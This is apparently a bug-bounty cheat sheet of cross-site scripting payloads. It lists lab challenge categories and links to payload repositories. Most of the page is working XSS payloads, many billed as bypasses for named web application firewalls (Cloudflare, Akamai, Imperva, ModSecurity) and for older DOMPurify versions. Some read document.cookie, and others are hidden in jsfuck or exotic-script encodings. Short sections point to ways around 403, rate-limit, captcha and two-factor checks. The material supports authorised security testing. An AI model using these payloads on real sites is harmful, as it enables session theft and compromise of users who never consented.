XSS PAYLOADS

🔹Single Reflection Using QUERY of URL🔹 01 - HTML Injection (a) 02 - HTML Injection Inline with Double Quotes (b1) 03 - HTML Injection Inline with Single Quotes (b2) 04 - HTML Injection Inline with Double Quotes: No Tag Breaking (b3) 05 - HTML Injection Inline with Single Quotes: No Tag Breaking (b4) 06 - HTML Injection with Single Quotes in JS Block (c1) 07 - HTML Injection with Double Quotes in JS Block (c2) 08-JS Injection with Single Quotes (c3) 09-JS Injection with Double Quotes (c4) 10 - Escaped JS Injection with Single Quotes (c5) 11 - Escaped JS Injection with Double Quotes (c6) 12-JS Injection In Event Handler (No Handler Breaking) 13-JS Injection in Fully Validated Anchor (Href) 14-XML Injection with CDATA and Comment Breakout (p, q & r)

🔹Single Reflection Using PATH of URL ("friendly URLs")🔹 01 - HTML Injection Inline PHP_SELF 02 - HTML Injection 1 Level Deep 03 - HTML Injection 2 Levels Deep 04 - HTML Injection 3 Levels Deep 05 - HTML Injection in Script Block 1 Level Deep 06 - HTML Injection in Script Block 2 Levels Deep 07 - HTML Injection in Script Block 3 Levels Deep 08 - JS Injection in Script Block 1 Level Deep 09 - JS Injection in Script Block 2 Levels Deep 10 - JS Injection in Script Block 3 Levels Deep

🔹Multi Reflection🔹 01 - Double Injection in HTML Context with Double Quotes 02 - Double Injection in Mixed Context (HTML + JS) with Default Quotes 03 - Quoteless Inline Double Injection in JS variables 04 - Quoteless Inline Double Injection in JS object 05 - Quoteless Inline Double Injection in JS object with Nested Array 06 - Quoteless Inline Double Injection in JS object with Nested Function

🔹 Special Cases🔹 01 - HTML Injection with Double Encoded Bypass 02 - HTML Injection with SQLi Error-Based * 03 - HTML Injection with PHP FILTER_VALIDATE_EMAIL Bypass 04 - HTML Injection with Strict-Length Input (32, 40 and 64 chars) 05 - HTML Injection with Strip-based Bypass (AFB) 06 - HTML Injection with Spell Checking Bypass 07 - HTML Injection with Base64 Encoded Input 08 - HTML Injection with Parameter Guessing 09 - HTML Injection in Parameter Name 10 - JS Injection with Single Quotes Fixing ReferenceError (also with Double Quotes and Escaped variations) 11 - Multi Context Injection with Bypass on Alpha-based Filter and JSON Encode Function (2 Different Entry Points) 12 - HTML Injection with CRLF in HTTP Header (Content-Type Replacement)

🔹DOM XSS🔹 01 - DOM Injection via URL parameter (by server + client) 02 - DOM Injection via URL Parameter (Document Sink) 03 - DOM Injection via Open Redirection (Location Sink) 04 - DOM Injection via URL Parameter (Execution Sink) 05 - DOM Injection via AJAX in URL Fragment (Document Sink) 06 - DOM Injection via AngularJS Library versions 1.6.0+ 07 - DOM Injection via Bootstrap Library versions 4.0.0, 4.1.0 and 4.1.1

🔹ALWAYS ALERT🔹

AllAboutBugBounty/Cross Site Scripting.md at master · daffainfo/AllAboutBugBountyGitHub

XSS-Payloads/Payloads.txt at master · RenwaX23/XSS-PayloadsGitHub

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection#cloudflare-xss-bypasses-by-bohdan-korzhynskyi

Check if your XSS triggers on a critical in scope domain not sandbox iframe or domain

alert(document.domain)
alert(window.origin)

window.alert(1)
window.document.cookie.alert(1) 
window.localStorage(1)

Try it on:

URL query, fragment & path;
all input fields.

//ALERT: COOKIE

with(document)alert(cookie)

//ALERT: document.domain

prompt`${document.domain}`

🔹XSS Without parentheses ()🔹

XSS-Payloads/Without-Parentheses.md at master · RenwaX23/XSS-PayloadsGitHub

This repo contains XSS payloads that doesn't require parentheses

🔹BYPASS: WAF🔹

GitHub - 0xInfection/Awesome-WAF: 🔥 Everything about web-application firewalls (WAF).GitHub

GitHub - Edr4/XSS-Bypass-FiltersGitHub

AllAboutBugBounty/Cross Site Scripting.md at master · daffainfo/AllAboutBugBountyGitHub

https://github.com/gprime31/WAF-bypass-xss-payloads/blob/master/Cloudflare%20xss%20payloads

Brute XSSBrute XSS

//AWS

<script>eval(atob(decodeURIComponent(confirm`1`)))</script>

//Akamai => tough but flawed

https://www.akamai.com/pt?x55=%22AutoFocus/%3E/OnFocus=top?.[%22ale%22%2B%22rt%22](1)/%22

https://brutelogic.com.br/gym.php?p08=%22AutoFocus/%3E/OnFocus=top?.[%22ale%22%2B%22rt%22](1)/%22
"AutoFocus/>/OnFocus=top?.["ale"+"rt"](1)/"

//CloudFlare => child's play

#.hta%253ciframe/srcdoc=<script/src="'-alert(document.domain)-'"></script>

#../index.php/%2522%253E%253Ciframe/srcdoc=<script/src="'-alert(document.domain)-'"></script>/
                                          
“>-setTimeout`\u0028alert(document.domain)\u0029`-’

'-setTimeout`prompt\u0028document.domain\u0029`-'


"><BODy onbeforescriptexecute="x1='cookie';c=')';b='a';location='jav'+b+'script:con'+'fir\u006d('+'document'+'.'+x1+c">


GET /search.html?ey272ayolocation.search=&q="><BODyonbeforescriptexecute="x1='cookie';c=')';b='a';location='jav'+b+'script:con'+'fir\u006d('+'document'+'.'+x1+c">

"><BODyonbeforescriptexecute="x1='cookie';c=')';b='a';location='jav'+b+'script:con'+'fir\u006d('+'document'+'.'+x1+c">

JavaScript://%250Aalert?.(1)//
'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!-->
</Title/</Style/</Script/</textArea/</iFrame/</noScript>
\74k<K/contentEditable/autoFocus/OnFocus=
/*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\76-->

<svg%0Aonauxclick=0;[1].some(confirm)//

<svg/onload={alert`1`}>

<a/href=j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;&lpar;a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;(1)&rpar;>

"><img%20src=x%20onmouseover=prompt%26%2300000000000000000040;document.cookie%26%2300000000000000000041;

"><onx=[] onmouseover=prompt(1)>

%2sscript%2ualert()%2s/script%2u

"Onx=() onMouSeoVer=prompt(1)>"Onx=[] onMouSeoVer=prompt(1)>"/*/Onx=""//onfocus=prompt(1)>"//Onx=""/*/%01onfocus=prompt(1)>"%01onClick=prompt(1)>"%2501onclick=prompt(1)>"onClick="(prompt)(1)"Onclick="(prompt(1))"OnCliCk="(prompt`1`)"Onclick="([1].map(confirm))

[1].map(confirm)'ale'+'rt'()a&Tab;l&Tab;e&Tab;r&Tab;t(1)prompt&lpar;1&rpar;prompt&#40;1&#41;prompt%26%2300000000000000000040;1%26%2300000000000000000041;(prompt())(prompt``)

<svg onload=alert%26%230000000040"1")>

<svg onload=prompt%26%230000000040document.domain)>

<svg onload=prompt%26%23x000000028;document.domain)>

<svg/onrandom=random onload=confirm(1)>

<video onnull=null onmouseover=confirm(1)>

<a id=x tabindex=1 onbeforedeactivate=print(`XSS`)></a><input autofocus>

<img ignored=() src=x onerror=prompt(1)>

<svg onx=() onload=(confirm)(1)>

<--`<img/src=` onerror=confirm``> --!>

<img src=x onerror="a=()=>{c=0;for(i in self){if(/^a[rel]+t$/.test(i)){return c}c++}};self[Object.keys(self)[a()]](document.domain)">

<j id=x style="-webkit-user-modify:read-write" onfocus={window.onerror=eval}throw/0/+name>H</j>#x

'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>

'"><img/src/onerror=.1|alert``>

:javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.cookie

Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();

//DOMPurify

delete DOMPurify.isSupported

delete document.implementation.__proto__.createHTMLDocument

<2.1

<math><mtext><table><mglyph><style><!--</style><img title="--&gt;&lt;/mglyph&gt;&lt;img&Tab;src=1&Tab;onerror=alert(1)&gt;">

<math><mtext><table><mglyph><style><![CDATA[</style><img title="]]&gt;&lt;/mglyph&gt;&lt;img&Tab;src=1&Tab;onerror=alert(1)&gt;">

<math><mtext><table><mglyph><style><!--</style><img title=&quot;--></mglyph><img	src=1	onerror=alert(1)>">

<2.0.1

<svg></p><style><a id="</style><img src=1 onerror=alert(1)>">

<svg><p><style><a id="</style><img src=1 onerror=alert(1)>"></p></svg>

//Cloudfront

">%0D%0A%0D%0A<x '="foo"><x foo='><img src=x onerror=javascript:alert(`cloudfrontbypass`)//'>

<--`<img%2fsrc%3d` onerror%3dalert(document.domain)> --!>

"><--<img+src= "><svg/onload+alert(document.domain)>> --!>

//Cloudbric

<a69/onclick=[1].findIndex(alert)>pew

//Comodo WAF

<input/oninput='new Function`confir\u006d\`0\``'>

<p/ondragstart=%27confirm(0)%27.replace(/.+/,eval)%20draggable=True>dragme

//ModSecurity

<a href="jav%0Dascript&colon;alert(1)">

//Imperva=> always naive

<input id='a'value='global'><input id='b'value='E'><input 'id='c'value='val'><input id='d'value='aler'><input id='e'value='t(documen'><input id='f'value='t.domain)'><svg+onload[\r\n]=$[a.value+b.value+c.value](d.value+e.value+f.value)>

<x/onclick=globalThis&lsqb;'\u0070r\u006f'+'mpt']&lt;)>clickme

<a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />click

<a69/onclick=write&lpar;&rpar;>pew

<details/ontoggle="self['wind'%2b'ow']['one'%2b'rror']=self['wind'%2b'ow']['ale'%2b'rt'];throw/**/self['doc'%2b'ument']['domain'];"/open>

<svg onload\r\n=$.globalEval("al"+"ert()");>

<svg/onload=self[`aler`%2b`t`]`1`>

%3Cimg%2Fsrc%3D%22x%22%2Fonerror%3D%22prom%5Cu0070t%2526%2523x28%3B%2526%2523x27%3B%2526%2523x58%3B%2526%2523x53%3B%2526%2523x53%3B%2526%2523x27%3B%2526%2523x29%3B%22%3E

<iframe/onload='this["src"]="javas&Tab;cript:al"+"ert``"';>

<img/src=q onerror='new Function`al\ert\`1\``'>

<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>

//Sucuri=> narrow ways

//

BYPASS: 302

Forcing Firefox to Execute XSS Payloads during 302 Redirects | Gremwell

Forcing HTTP Redirect XSSHAHWUL

ws://google.com"><svg/onload=alert(2)>
wss://google.com"><svg/onload=alert(2)>
resource://google.com"><svg/onload=alert(2)>

BYPASS: 403 (Forbidden)

https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20403.md

Reflected XSS on ???? via ?? patameter 404 Not Found hides something

Found 404 subdomain.
Do bruteforce with FFUF and find 200 OK endpoint.
Do parameter fuzzing with Arjun.
That parameter with vulnerable to XSS.

BYPASS: 429 (Too Many Requests)

https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20429.md

BYPASS: Captcha (Google reCAPTCHA)

https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20Captcha.md

BYPASS: Two-Factor Authentication

https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%202FA.md

🔹ENCODE PAYLOAD🔹

TRANSLATE JAVASCRIPT TO OTHER WRITING SYSTEMS.

//Encode: jsfuck

https://jsfuck.com/

[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()

[][[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][!+[]+!+[]+!+[]]+[[]+{}][+[]][+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[![]+[]][+[]][!+[]+!+[]+!+[]]+[!![]+[]][+[]][+[]]+[!![]+[]][+[]][+!+[]]+[[][[]]+[]][+[]][+[]]+[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][!+[]+!+[]+!+[]]+[!![]+[]][+[]][+[]]+[[]+{}][+[]][+!+[]]+[!![]+[]][+[]][+!+[]]][[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][!+[]+!+[]+!+[]]+[[]+{}][+[]][+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[![]+[]][+[]][!+[]+!+[]+!+[]]+[!![]+[]][+[]][+[]]+[!![]+[]][+[]][+!+[]]+[[][[]]+[]][+[]][+[]]+[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][!+[]+!+[]+!+[]]+[!![]+[]][+[]][+[]]+[[]+{}][+[]][+!+[]]+[!![]+[]][+[]][+!+[]]]`$${[!{}+[]][+[]][+!+[]]+[!{}+[]][+[]][+!+[]+!+[]]+[!{}+[]][+[]][+!+[]+!+[]+!+[]+!+[]]+[!![]+[]][+[]][+!+[]]+[!![]+[]][+[]][+[]]+[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[+!+[]][+[]]+[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]}$```//Function(alert(1))

//Encode: aurebesh

https://aem1k.com/aurebesh.js/#

//Encode: Katakana

https://www.sljfaq.org/cgi/e2k.cgi

javascript:([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')()

//Encode: Lontara

https://lingojam.com/Lontara

ᨆ='',ᨊ=!ᨆ+ᨆ,ᨎ=!ᨊ+ᨆ,ᨂ=ᨆ+{},ᨇ=ᨊ[ᨆ++],ᨋ=ᨊ[ᨏ=ᨆ],ᨃ=++ᨏ+ᨆ,ᨅ=ᨂ[ᨏ+ᨃ],ᨊ[ᨅ+=ᨂ[ᨆ]+(ᨊ.ᨎ+ᨂ)[ᨆ]+ᨎ[ᨃ]+ᨇ+ᨋ+ᨊ[ᨏ]+ᨅ+ᨇ+ᨂ[ᨆ]+ᨋ][ᨅ](ᨎ[ᨆ]+ᨎ[ᨏ]+ᨊ[ᨃ]+ᨋ+ᨇ+"(ᨆ)")()

//Encode: Cuneiform

https://funtranslations.com/babylonian

𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++],𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀]+(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀]+𒀟][𒁹](𒀃[𒀀]+𒀃[𒈫]+𒉺[𒀆]+𒀟+𒌐+"(𒀀)")()

Polyglot XSS

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

PreviousXSS NextGRAPHQL

Last updated 12 months ago